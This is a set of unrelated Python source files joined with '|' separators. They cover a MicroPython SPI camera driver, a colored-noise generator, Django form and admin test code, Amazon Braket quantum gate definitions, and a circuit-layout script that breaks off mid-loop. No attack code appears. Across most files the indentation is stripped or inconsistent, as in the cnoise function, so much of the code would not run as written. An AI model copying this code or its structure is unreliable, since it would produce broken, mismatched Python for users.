#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
from micropython import const
from pyb import Pin
import sensor
class CameraSlave():
control = None
rx_image_width = 320
rx_image_height = 240
spi = None
rx_buff = None
tx_buff = None
def __init__(self, spi, width, height, alloc_tx_buff=False, alloc_rx_buff=False, pin_data_ready=None, sync_cancel_condition=None):
self.spi = spi
if alloc_tx_buff:
self.tx_buff = sensor.alloc_extra_fb(width, height, sensor.RGB565)
if alloc_rx_buff:
self.rx_buff = sensor.alloc_extra_fb(width, height, sensor.RGB565)
self.pin_data_ready = Pin(pin_data_ready, Pin.IN)
if not sync_cancel_condition:
self.sync_cancel_condition = lambda: False
else:
self.sync_cancel_condition = sync_cancel_condition
self.control = CameraSlaveControl()
def sync(self, ignore_busy=False):
if not ignore_busy:
while self.pin_data_ready and self.pin_data_ready.value() == 1:
if self.sync_cancel_condition():
return False
if self.tx_buff is not None and self.rx_buff is not None:
self.spi.send_recv(self.tx_buff.bytearray(), self.rx_buff.bytearray())
elif self.tx_buff is not None:
self.spi.send(self.tx_buff.bytearray())
elif self.rx_buff is not None:
self.spi.recv(self.rx_buff.bytearray())
self.spi.send(self.control.buff)
return True
def increase_column_offset(self):
self.control.column_offset += 1
def decrease_column_offset(self):
self.control.column_offset -= 1
def increase_row_offset(self):
self.control.row_offset += 1
def decrease_row_offset(self):
self.control.row_offset -= 1
def increase_column_factor(self):
self.control.column_zoom_numerator += 1
self.control.column_zoom_denominator = 20
def decrease_column_factor(self):
self.control.column_zoom_numerator -= 1
self.control.column_zoom_denominator = 20
def increase_row_factor(self):
self.control.row_zoom_numerator += 1
self.control.row_zoom_denominator = 20
def decrease_row_factor(self):
self.control.row_zoom_numerator -= 1
self.control.row_zoom_denominator = 20
class CameraSlaveControl():
COLUMN_OFFSET = const(0)
ROW_OFFSET = const(1)
COLUMN_ZOOM_NUMERATOR = const(2)
COLUMN_ZOOM_DENOMINATOR = const(3)
ROW_ZOOM_NUMERATOR = const(4)
ROW_ZOOM_DENOMINATOR = const(5)
def __init__(self):
self.buff = bytearray(6)
@property
def column_offset(self):
return self.buff[COLUMN_OFFSET]
@column_offset.setter
def column_offset(self, column_offset):
self.buff[COLUMN_OFFSET] = column_offset
@property
def row_offset(self):
return self.buff[ROW_OFFSET]
@row_offset.setter
def row_offset(self, row_offset):
self.buff[ROW_OFFSET] = row_offset
@property
def column_zoom_numerator(self):
return self.buff[COLUMN_ZOOM_NUMERATOR]
@column_zoom_numerator.setter
def column_zoom_numerator(self, column_zoom_numerator):
self.buff[COLUMN_ZOOM_NUMERATOR] = column_zoom_numerator
@property
def column_zoom_denominator(self):
return self.buff[COLUMN_ZOOM_DENOMINATOR]
@column_zoom_denominator.setter
def column_zoom_denominator(self, column_zoom_denominator):
self.buff[COLUMN_ZOOM_DENOMINATOR] = column_zoom_denominator
@property
def row_zoom_numerator(self):
return self.buff[ROW_ZOOM_NUMERATOR]
@row_zoom_numerator.setter
def row_zoom_numerator(self, row_zoom_numerator):
self.buff[ROW_ZOOM_NUMERATOR] = row_zoom_numerator
@property
def row_zoom_denominator(self):
return self.buff[ROW_ZOOM_DENOMINATOR]
@row_zoom_denominator.setter
def row_zoom_denominator(self, row_zoom_denominator):
self.buff[ROW_ZOOM_DENOMINATOR] = row_zoom_denominator
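# A minimal usage sketch (MicroPython/OpenMV target; the SPI bus number and pin name
# below are illustrative, not taken from this module):
#
#   from pyb import SPI
#   spi = SPI(2, SPI.MASTER, baudrate=int(1e6))
#   slave = CameraSlave(spi, width=320, height=240,
#                       alloc_rx_buff=True, pin_data_ready='P4')
#   slave.increase_row_offset()   # tweaks the 6-byte control packet
#   slave.sync()                  # exchanges frame data, then sends control.buff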
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Aug 3 16:27:19 2018
@author: binggu
"""
import numpy as np
#! program to illustrate the colored Gaussian Noise generator CGAUSS
#! The routine must be initialized with CGAUS0 and calls a flat distribution
#! random number generator available with most compilers or you can write your
#! own. Here we used the routine RAN1 from Numerical Recipes 2nd Edition, by
#! Press, Teukolsky, Vetterling, and Flannery.
#!
#! It now uses the F90 intrinsic subroutine RANDOM_NUMBER.
#!
#! The White Guassian noise generator GASDEV from Numerical Recipes was
#! adapted to produce Colored Gaussian noise. The basic equations for this
#! computation are presented in the article by
#! Fox et al., Physical Review A vol.38(1988) page 5938.
#! This code was [originally] compiled and tested with Microsoft Powerstation.
#
#! It was modified by Walt Brainerd to be standard Fortran and
#! compiled on NAGWare F90.
def corr(eps):
    """
    Calculate the autocorrelation function of the noise series stored in eps[nstep, nsample].
    """
    nstep, nsample = eps.shape
    cor = np.zeros(nstep)
    npts = nstep * nsample
    for idly in range(nstep):
        mean = 0.0
        for i in range(nsample):
            for j in range(nstep - idly):
                mean += eps[j, i] * eps[j + idly, i]
        cor[idly] = mean / float(npts)
    return cor
def cnoise(nstep, nsample, dt=0.001, tau=0.0025, ave=0., D=0.0025, ):
"""
store several series of Gaussian noise values in array EPS.
This is based on the algorithm in R. F. Fox et al. Phys. Rev. A 38, 11 (1988).
The generated noise satisfy <eps(t) eps(s)> = D/tau * exp(-|t-s|/tau), and
the initial distribution is Gaussian N(0, sigma) with sigma**2 = D/tau
INPUT:
dt: timestep, default 0.001
tau: correlation time, default 0.0025
ave: average value, default 0.0
D: strength of the noise, default 0.0025
OUTPUT:
eps: eps[nstep, nsample] colored Gaussian noise
"""
    sigma = np.sqrt(D / tau)  # standard deviation of the stationary distribution
# initialize
eps = np.zeros((nstep, nsample))
    eps[0, :] = np.random.randn(nsample) * sigma  # Gaussian initial condition N(0, sigma)
E = np.exp(-dt/tau)
for j in range(nsample):
for i in range(nstep-1):
a = np.random.rand()
b = np.random.rand()
h = np.sqrt(-2. * D / tau * (1. - E**2) * np.log(a)) * np.cos(2. * np.pi * b)
eps[i+1, j] = eps[i, j] * E + h
return eps
# get input parameters (typical values shown)
# open(1,file='fastcnoise.dat')
# read(1,*)nreal !number of realizations=1000
# read(1,*)nstep !max delay in corr. func=10
# read(1,*)dt !time step size=.5
# read(1,*)cortim !corr. time in the same units as DT=5
# read(1,*)ave !average value for gaussian distri
# read(1,*)sigma !sigma for gaussian distribution
# close(1)
# allocate(eps(nreal,-1:nstep*2))
# allocate(flag(nreal))
# flag='N'
# store the noise
#f = open('fastcnoise.out', 'w')
#f.write('{} '.format( sigma*np.sqrt(tau)*eps(:,j) + ave
#f.close()
#! calculate the error in autocorrelation function in variable STD.
# do i=1,nreal
# do j=0,nstep
# std=std+dble((eps(i,j)*eps(i,j+idly)-smean)**2.)
# enddo
# enddo
# std=sqrt(std)/dble(npts-1.)
# write(2,*)idly,mean,std !output results
# enddo
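# A minimal usage sketch (illustrative sizes, kept small so the pure-Python corr()
# loop stays fast): generate the colored noise and check that its sample variance is
# close to the stationary value D/tau quoted in the cnoise docstring.
if __name__ == '__main__':
    nstep, nsample = 200, 20
    eps = cnoise(nstep, nsample, dt=0.001, tau=0.0025, D=0.0025)
    print(eps.shape)                   # (200, 20)
    print(eps.var(), 0.0025 / 0.0025)  # sample variance vs the stationary value D/tau
    print(corr(eps)[:3])               # first few lags of the autocorrelation estimate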
|
# import the time module
import time
# get the current clock ticks from the time() function
seconds = time.time()
print(seconds)
currentTime = time.localtime(seconds)
# print the currentTime variable to know about it
print(currentTime,'\n')
# use current time to show current time in formatted string
print('Current System time is :', time.asctime(currentTime))
print('Formatted Time is :', time.strftime("%d/%m/%Y", currentTime)) |
from attr import attrs
from google.protobuf.message import DecodeError
from .constants import API_URL
from .pb import upload_pb2
from ..models import Call, ParsedResponse
@attrs(slots=True)
class MusicManagerCall(Call):
base_url = API_URL
request_type = response_type = upload_pb2.UploadResponse
def __attrs_post_init__(self, uploader_id):
self._data = self.request_type()
self._data.uploader_id = uploader_id
self._headers.update(
{'Content-Type': 'application/x-google-protobuf'}
)
self._params.update({'version': 1})
if self.endpoint:
self._url = f'{self.base_url}/{self.endpoint}'
@property
def body(self):
"""Binary-encoded body of the HTTP request."""
return self._data.SerializeToString() if self._data else b''
def parse_response(self, response_headers, response_body):
try:
res_body = self.response_type()
res_body.ParseFromString(response_body)
except DecodeError:
raise
# TODO: Better exception.
if not self.check_success(res_body):
raise Exception(f"{self.__class__.__name__} call failed: {res_body}")
return ParsedResponse(headers=response_headers, body=res_body)
|
from django import forms
from django.contrib.auth.forms import AuthenticationForm
class RememberMeAuthenticationForm(AuthenticationForm):
remember = forms.BooleanField(required=False, widget=forms.CheckboxInput())
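# A minimal usage sketch (hypothetical view wiring, not part of this module):
#
#   from django.contrib.auth.views import LoginView
#
#   class RememberMeLoginView(LoginView):
#       authentication_form = RememberMeAuthenticationForm
#
# The view (or project settings) would then decide how to act on
# form.cleaned_data['remember'], e.g. by extending the session expiry.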
|
from django.contrib import admin
from admin_view.admin import CustomAdmin, ModelViewAdmin
from admin_view.views.base import AdminTemplateView
from tests.models import ExampleModel
class ExampleView(AdminTemplateView):
pass
class CustomExampleAdmin(CustomAdmin):
app_label = 'tests'
module_name = 'custom'
verbose_name = 'Custom template admin'
verbose_name_plural = verbose_name
permissions = {
'only_self': "Can view only self orders"
}
add_view = change_view = changelist_view = ExampleView
def get_title(self, obj):
return "A Example admin"
CustomExampleAdmin.register_at(admin.site)
@admin.register(ExampleModel)
class ExampleModelAdmin(admin.ModelAdmin):
pass
class ExampleCloneAdmin(ModelViewAdmin):
model = ExampleModel
app_label = 'tests'
module_name = 'example_model_clone'
list_display = ['title']
list_display_links = ['title']
view_classes = {
'add': AdminTemplateView
}
ExampleCloneAdmin.register_at(admin.site)
|
# Copyright Amazon.com Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from enum import Enum
from braket.ir.jaqcd.shared_models import (
Angle,
CompilerDirective,
DampingProbability,
DampingSingleProbability,
DoubleControl,
DoubleTarget,
MultiTarget,
SingleControl,
SingleProbability,
SingleProbability_34,
SingleProbability_1516,
SingleTarget,
TripleProbability,
TwoDimensionalMatrix,
TwoDimensionalMatrixList,
)
"""
Instructions that can be supplied to the braket.ir.jaqcd.Program.
To add a new instruction:
- Implement a class in this module.
- Class must contain a property, "type", that is an enum of the class implemented in the
next step.
- Implement a subclass, "Type", within this class that extends [str, enum].
All enum values must be unique across all instructions, otherwise de-serialization
    will have nondeterministic behavior. These enums will be used to determine what type
the instruction is, i.e. what class to use for deserializing.
    - NOTE: Due to how multiple inheritance works in Python it is easiest to define a
type enum class within each instruction, instead of calling the relevant parent
constructors to initialize it correctly.
- Inherit any classes from braket.ir.jaqcd.shared_models.
- Write up docstrings to define the instruction, properties, and examples.
"""
class H(SingleTarget):
"""
Hadamard gate.
Attributes:
type (str): The instruction type. default = "h". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> H(target=1)
"""
class Type(str, Enum):
h = "h"
type = Type.h
class I(SingleTarget): # noqa: E742, E261
"""
Identity gate.
Attributes:
type (str): The instruction type. default = "i". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> I(target=1)
"""
class Type(str, Enum):
i = "i"
type = Type.i
class X(SingleTarget):
"""
Pauli-X gate.
Attributes:
type (str): The instruction type. default = "x". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> X(target=0)
"""
class Type(str, Enum):
x = "x"
type = Type.x
class Y(SingleTarget):
"""
Pauli-Y gate.
Attributes:
type (str): The instruction type. default = "y". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> Y(target=0)
"""
class Type(str, Enum):
y = "y"
type = Type.y
class Z(SingleTarget):
"""
Pauli-Z gate.
Attributes:
type (str): The instruction type. default = "z". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> Z(target=0)
"""
class Type(str, Enum):
z = "z"
type = Type.z
class Rx(SingleTarget, Angle):
"""
X-axis rotation gate.
Attributes:
type (str): The instruction type. default = "rx". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
Examples:
>>> Rx(target=0, angle=0.15)
"""
class Type(str, Enum):
rx = "rx"
type = Type.rx
class Ry(SingleTarget, Angle):
"""
Y-axis rotation gate.
Attributes:
type (str): The instruction type. default = "ry". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
Examples:
>>> Ry(target=0, angle=0.15)
"""
class Type(str, Enum):
ry = "ry"
type = Type.ry
class Rz(SingleTarget, Angle):
"""
Z-axis rotation gate.
Attributes:
type (str): The instruction type. default = "rz". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
Examples:
>>> Rz(target=0, angle=0.15)
"""
class Type(str, Enum):
rz = "rz"
type = Type.rz
class S(SingleTarget):
"""
S gate. Applies a 90 degree rotation around the Z-axis.
Attributes:
type (str): The instruction type. default = "s". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> S(target=0)
"""
class Type(str, Enum):
s = "s"
type = Type.s
class T(SingleTarget):
"""
T gate. Applies a 45 degree rotation around the Z-axis.
Attributes:
type (str): The instruction type. default = "t". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> T(target=0)
"""
class Type(str, Enum):
t = "t"
type = Type.t
class Si(SingleTarget):
"""
Si gate. Conjugate transpose of S gate.
Attributes:
type (str): The instruction type. default = "si". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> Si(target=0)
"""
class Type(str, Enum):
si = "si"
type = Type.si
class Ti(SingleTarget):
"""
Ti gate. Conjugate transpose of T gate.
Attributes:
type (str): The instruction type. default = "ti". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> Ti(target=0)
"""
class Type(str, Enum):
ti = "ti"
type = Type.ti
class Swap(DoubleTarget):
"""
Swap gate. Swaps the state of the two qubits.
Attributes:
type (str): The instruction type. default = "swap". (type) is optional.
This should be unique among all instruction types.
targets (List[int]): The target qubits.
This is a list with two items and all items are int >= 0.
Examples:
>>> Swap(targets=[0, 1])
"""
class Type(str, Enum):
swap = "swap"
type = Type.swap
class CSwap(SingleControl, DoubleTarget):
"""
Controlled swap gate.
Attributes:
type (str): The instruction type. default = "cswap". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit. This is an int >= 0.
targets (List[int]): The target qubits.
This is a list with two items and all items are int >= 0.
Examples:
        >>> CSwap(control=0, targets=[1, 2])
"""
class Type(str, Enum):
cswap = "cswap"
type = Type.cswap
class ISwap(DoubleTarget):
"""
ISwap gate. Swaps the state of two qubits, applying a -i phase to q1 when it is in the 1 state
and a -i phase to q2 when it is in the 0 state.
This is equivalent to XY(pi)
Attributes:
type (str): The instruction type. default = "iswap". (type) is optional.
This should be unique among all instruction types.
targets (List[int]): The target qubits.
This is a list with two items and all items are int >= 0.
Examples:
>>> ISwap(targets=[0, 1])
"""
class Type(str, Enum):
iswap = "iswap"
type = Type.iswap
class PSwap(DoubleTarget, Angle):
"""
    Parameterized swap gate that takes in the angle of the phase to apply to the swapped states.
Attributes:
type (str): The instruction type. default = "pswap". (type) is optional.
This should be unique among all instruction types.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
targets (List[int]): The target qubits.
This is a list with two items and all items are int >= 0.
Examples:
>>> PSwap(targets=[0, 1], angle=0.15)
"""
class Type(str, Enum):
pswap = "pswap"
type = Type.pswap
class XY(DoubleTarget, Angle):
"""
Rotates between \\|01> and \\|10> by the given angle.
Attributes:
type (str): The instruction type. default = "xy". (type) is optional.
This should be unique among all instruction types.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
targets (List[int]): The target qubits.
This is a list with two items and all items are int >= 0.
Examples:
>>> XY(targets=[0, 1], angle=0.15)
"""
class Type(str, Enum):
xy = "xy"
type = Type.xy
class PhaseShift(SingleTarget, Angle):
"""
Phase shift gate. Shifts the phase between \\|0> and \\|1> by a given angle.
Attributes:
type (str): The instruction type. default = "phaseshift". (type) is optional.
This should be unique among all instruction types.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> PhaseShift(target=1, angle=0.15)
"""
class Type(str, Enum):
phaseshift = "phaseshift"
type = Type.phaseshift
class CPhaseShift(SingleTarget, SingleControl, Angle):
"""
Controlled phase shift gate.
Attributes:
type (str): The instruction type. default = "cphaseshift". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit. This is an int >= 0.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> CPhaseShift(control=0, target=1, angle=0.15)
"""
class Type(str, Enum):
cphaseshift = "cphaseshift"
type = Type.cphaseshift
class CPhaseShift00(SingleTarget, SingleControl, Angle):
"""
Controlled phase shift gate that phases the \\|00> state.
Attributes:
type (str): The instruction type. default = "cphaseshift00". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit. This is an int >= 0.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> CPhaseShift00(control=0, target=1, angle=0.15)
"""
class Type(str, Enum):
cphaseshift00 = "cphaseshift00"
type = Type.cphaseshift00
class CPhaseShift01(SingleTarget, SingleControl, Angle):
"""
Controlled phase shift gate that phases the \\|01> state.
Attributes:
type (str): The instruction type. default = "cphaseshift01". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit. This is an int >= 0.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> CPhaseShift01(control=0, target=1, angle=0.15)
"""
class Type(str, Enum):
cphaseshift01 = "cphaseshift01"
type = Type.cphaseshift01
class CPhaseShift10(SingleTarget, SingleControl, Angle):
"""
Controlled phase shift gate that phases the \\|10> state.
Attributes:
type (str): The instruction type. default = "cphaseshift10". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit. This is an int >= 0.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> CPhaseShift10(control=0, target=1, angle=0.15)
"""
class Type(str, Enum):
cphaseshift10 = "cphaseshift10"
type = Type.cphaseshift10
class CNot(SingleTarget, SingleControl):
"""
Controlled not gate. Also known as the CX gate.
Attributes:
type (str): The instruction type. default = "cnot". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit. This is an int >= 0.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> CNot(control=0, target=1)
"""
class Type(str, Enum):
cnot = "cnot"
type = Type.cnot
class CCNot(SingleTarget, DoubleControl):
"""
Doubly-controlled NOT gate. Also known as the Toffoli gate.
Attributes:
type (str): The instruction type. default = "ccnot". (type) is optional.
This should be unique among all instruction types.
        controls (List[int]): The control qubits.
This is a list with two items and all items are int >= 0.
target (int): The target qubit. This is an int >= 0.
Examples:
        >>> CCNot(controls=[0, 1], target=2)
"""
class Type(str, Enum):
ccnot = "ccnot"
type = Type.ccnot
class CY(SingleTarget, SingleControl):
"""
Controlled Y-gate.
Attributes:
type (str): The instruction type. default = "cy". (type) is optional.
This should be unique among all instruction types.
        control (int): The control qubit. This is an int >= 0.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> CY(control=0, target=1)
"""
class Type(str, Enum):
cy = "cy"
type = Type.cy
class CZ(SingleTarget, SingleControl):
"""
Controlled Z-gate.
Attributes:
type (str): The instruction type. default = "cz". (type) is optional.
This should be unique among all instruction types.
control (int): The control qubit. This is an int >= 0.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> CZ(control=0, target=1)
"""
class Type(str, Enum):
cz = "cz"
type = Type.cz
class XX(DoubleTarget, Angle):
"""
The Ising (XX) gate.
Attributes:
type (str): The instruction type. default = "xx". (type) is optional.
This should be unique among all instruction types.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
targets (List[int]): The target qubits.
This is a list with two items and all items are int >= 0.
Examples:
>>> XX(targets=[0, 1], angle=0.15)
"""
class Type(str, Enum):
xx = "xx"
type = Type.xx
class YY(DoubleTarget, Angle):
"""
The Ising (YY) gate.
Attributes:
type (str): The instruction type. default = "yy". (type) is optional.
This should be unique among all instruction types.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
targets (List[int]): The target qubits.
This is a list with two items and all items are int >= 0.
Examples:
>>> YY(targets=[0, 1], angle=0.15)
"""
class Type(str, Enum):
yy = "yy"
type = Type.yy
class ZZ(DoubleTarget, Angle):
"""
The Ising (ZZ) gate.
Attributes:
type (str): The instruction type. default = "zz". (type) is optional.
This should be unique among all instruction types.
angle (float): The angle in radians.
inf, -inf, and NaN are not allowable inputs.
targets (List[int]): The target qubits.
This is a list with two items and all items are int >= 0.
Examples:
>>> ZZ(targets=[0, 1], angle=0.15)
"""
class Type(str, Enum):
zz = "zz"
type = Type.zz
class V(SingleTarget):
"""
Square root of NOT gate.
Attributes:
type (str): The instruction type. default = "v". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> V(target=0)
"""
class Type(str, Enum):
v = "v"
type = Type.v
class Vi(SingleTarget):
"""
Conjugate transpose of square root of NOT gate.
Attributes:
type (str): The instruction type. default = "vi". (type) is optional.
This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> Vi(target=0)
"""
class Type(str, Enum):
vi = "vi"
type = Type.vi
class Unitary(TwoDimensionalMatrix, MultiTarget):
"""
Arbitrary unitary matrix gate
Attributes:
type (str): The instruction type. default = "unitary". (type) is optional.
This should be unique among all instruction types.
targets (List[int]): The target qubits. This is a list with ints and all ints >= 0.
matrix (List[List[List[float]]]): The unitary matrix specifying the behavior of the gate.
Examples:
>>> Unitary(targets=[0], matrix=[[[0, 0], [1, 0]],[[1, 0], [0, 1]]])
"""
class Type(str, Enum):
unitary = "unitary"
type = Type.unitary
class BitFlip(SingleTarget, SingleProbability):
"""
Bit Flip noise channel.
Attributes:
type (str): The instruction type. default = "bit_flip". (type) is
optional. This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> BitFlip(target=1, probability=0.1)
"""
class Type(str, Enum):
bit_flip = "bit_flip"
type = Type.bit_flip
class PhaseFlip(SingleTarget, SingleProbability):
"""
Phase Flip noise channel.
Attributes:
type (str): The instruction type. default = "phase_flip". (type) is
optional. This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> PhaseFlip(target=1, probability=0.1)
"""
class Type(str, Enum):
phase_flip = "phase_flip"
type = Type.phase_flip
class PauliChannel(SingleTarget, TripleProbability):
"""
    General Pauli noise channel.
Attributes:
type (str): The instruction type. default = "pauli_channel". (type) is
optional. This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> PauliChannel(target=1, probX=0.1, probY=0.2, probZ=0.3)
"""
class Type(str, Enum):
pauli_channel = "pauli_channel"
type = Type.pauli_channel
class Depolarizing(SingleTarget, SingleProbability_34):
"""
Depolarizing noise channel.
Attributes:
type (str): The instruction type. default = "depolarizing". (type) is
optional. This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> Depolarizing(target=1, probability=0.1)
"""
class Type(str, Enum):
depolarizing = "depolarizing"
type = Type.depolarizing
class TwoQubitDepolarizing(DoubleTarget, SingleProbability_1516):
"""
Two-Qubit Depolarizing noise channel.
Attributes:
type (str): The instruction type. default = "two_qubit_depolarizing".
(type) is optional. This should be unique among all instruction types.
        targets (List[int]): The target qubits.
            This is a list with two items and all items are int >= 0.
    Examples:
        >>> TwoQubitDepolarizing(targets=[0, 1], probability=0.1)
"""
class Type(str, Enum):
two_qubit_depolarizing = "two_qubit_depolarizing"
type = Type.two_qubit_depolarizing
class TwoQubitDephasing(DoubleTarget, SingleProbability_34):
"""
Two-Qubit Dephasing noise channel.
Attributes:
type (str): The instruction type. default = "two_qubit_dephasing".
(type) is optional. This should be unique among all instruction types.
        targets (List[int]): The target qubits.
            This is a list with two items and all items are int >= 0.
    Examples:
        >>> TwoQubitDephasing(targets=[0, 1], probability=0.1)
"""
class Type(str, Enum):
two_qubit_dephasing = "two_qubit_dephasing"
type = Type.two_qubit_dephasing
class AmplitudeDamping(SingleTarget, DampingProbability):
"""
Amplitude Damping noise channel.
Attributes:
type (str): The instruction type. default = "amplitude_damping". (type) is
optional. This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> AmplitudeDamping(target=1, gamma=0.1)
"""
class Type(str, Enum):
amplitude_damping = "amplitude_damping"
type = Type.amplitude_damping
class GeneralizedAmplitudeDamping(SingleTarget, DampingProbability, DampingSingleProbability):
"""
Generalized Amplitude Damping noise channel.
Attributes:
type (str): The instruction type. default = "generalized_amplitude_damping". (type) is
optional. This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> GeneralizedAmplitudeDamping(target=1, gamma=0.1, probability=0.9)
"""
class Type(str, Enum):
generalized_amplitude_damping = "generalized_amplitude_damping"
type = Type.generalized_amplitude_damping
class PhaseDamping(SingleTarget, DampingProbability):
"""
Phase Damping noise channel.
Attributes:
type (str): The instruction type. default = "phase_damping". (type) is
optional. This should be unique among all instruction types.
target (int): The target qubit. This is an int >= 0.
Examples:
>>> PhaseDamping(target=1, gamma=0.1)
"""
class Type(str, Enum):
phase_damping = "phase_damping"
type = Type.phase_damping
class Kraus(TwoDimensionalMatrixList, MultiTarget):
"""
Arbitrary quantum channel defined by the input matrices.
Attributes:
type (str): The instruction type. default = "kraus". (type) is optional.
This should be unique among all instruction types.
targets (List[int]): The target qubits. This is a list with ints and all ints >= 0.
matrices (List[List[List[List[float]]]]): A list of matrices specifying
the quantum channel. A complex number is represented as a list of 2
real numbers. So each matrix has type List[List[List[float]]].
Examples:
>>> matrix1 = [[[1/sqrt(2), 0],[0, 0]],[[0, 0],[1/sqrt(2), 0]]]
>>> matrix2 = [[[0, 0],[1/sqrt(2), 0]],[[1/sqrt(2), 0],[0, 0]]]
>>> matrices = [matrix1, matrix2]
>>> Kraus(targets=[0], matrices=matrices)
"""
class Type(str, Enum):
kraus = "kraus"
type = Type.kraus
class StartVerbatimBox(CompilerDirective):
"""
StartVerbatimBox is a compiler instruction to start a portion of code that
will preserve the instruction within StartVerbatimBox and EndVerbatimBox
from being modified in any way by the compiler.
Attributes:
type (str): The instruction type. default = "start_verbatim_box". (type) is optional.
This should be unique among all instruction types.
Examples:
>>> StartVerbatimBox()
"""
class Type(str, Enum):
start_verbatim_box = "start_verbatim_box"
type = Type.start_verbatim_box
directive: str = "StartVerbatimBox"
class EndVerbatimBox(CompilerDirective):
"""
EndVerbatimBox is a compiler instruction to mark the end of a portion of code
that preserves the instruction within StartVerbatimBox and EndVerbatimBox
from being modified in any way by the compiler.
Attributes:
type (str): The instruction type. default = "end_verbatim_box". (type) is optional.
This should be unique among all instruction types.
Examples:
>>> EndVerbatimBox()
"""
class Type(str, Enum):
end_verbatim_box = "end_verbatim_box"
type = Type.end_verbatim_box
directive: str = "EndVerbatimBox"
|
import numpy
from torch import nn
import torch
|
import pathlib
from cktgen.cktgen import *
if __name__ == "__main__":
args,tech = parse_args()
ndev = ADT( tech, "n",npp=6,nr=1)
ndev.addM1Terminal( "s", 1)
ndev.addM1Terminal( "g", 3)
ndev.addM1Terminal( "d", 5)
pdev = ADT( tech, "p",npp=6,nr=1)
pdev.addM1Terminal( "s", 1)
pdev.addM1Terminal( "g", 3)
pdev.addM1Terminal( "d", 5)
# python cktgen.py --block_name mydesign
def xg( x):
return tech.pitchPoly*tech.halfXGRGrid*2*x
def yg( y):
return tech.pitchDG *tech.halfYGRGrid*2*y
def mirrorAcrossYAxis( adt):
return ADITransform.mirrorAcrossYAxis().preMult( ADITransform.translate( adt.bbox.urx, 0))
# n = 18
# k = (n-2)//2
k = 8
n = 2*k+3
netl = Netlist( nm=args.block_name, bbox=Rect( 0,0, xg(n), yg(n)))
adnetl = ADNetlist( args.block_name)
#left and right
for i in range(n-3-k):
sx = 0
sy = n-2-i
fx = n-1
fy = n-3-k-i
adnetl.addInstance( ADI( ndev, ("un%d" % i), ADITransform.translate( xg(sx), yg(sy))))
adnetl.addInstance( ADI( pdev, ("vn%d" % i), mirrorAcrossYAxis( pdev).preMult( ADITransform.translate( xg(fx), yg(fy)))))
for (f,a) in [('g','i'),('d','o'),('s','z')]:
adnetl.connect( 'un%d' % i, f, ('%s%d' % (a,i)))
